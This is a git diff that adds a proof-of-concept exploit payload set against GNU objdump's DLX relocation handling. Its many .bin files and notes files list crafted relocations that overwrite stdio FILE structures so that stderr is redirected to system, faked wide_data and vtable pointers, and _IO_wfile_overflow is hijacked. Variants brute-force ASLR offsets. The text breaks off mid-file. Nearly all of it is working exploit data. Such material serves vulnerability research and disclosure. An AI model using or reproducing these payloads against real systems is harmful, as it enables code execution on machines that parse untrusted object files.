target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000..fe5f171 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..5c95897 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000..088ecfa Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..a68f6bc --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000..a4ae616 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..eff03e0 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000..1b682a9 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..87bd974 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000..8f5ab73 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..3d99c7f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000..7c5ed70 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..7850157 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000..4c4baf7 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..435b33c --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin new file mode 100644 index 0000000..5a44876 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes new file mode 100644 index 0000000..e625fea --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000..c3bd2df Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..db97a8a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000..d255eda Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..60bc8f9 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch 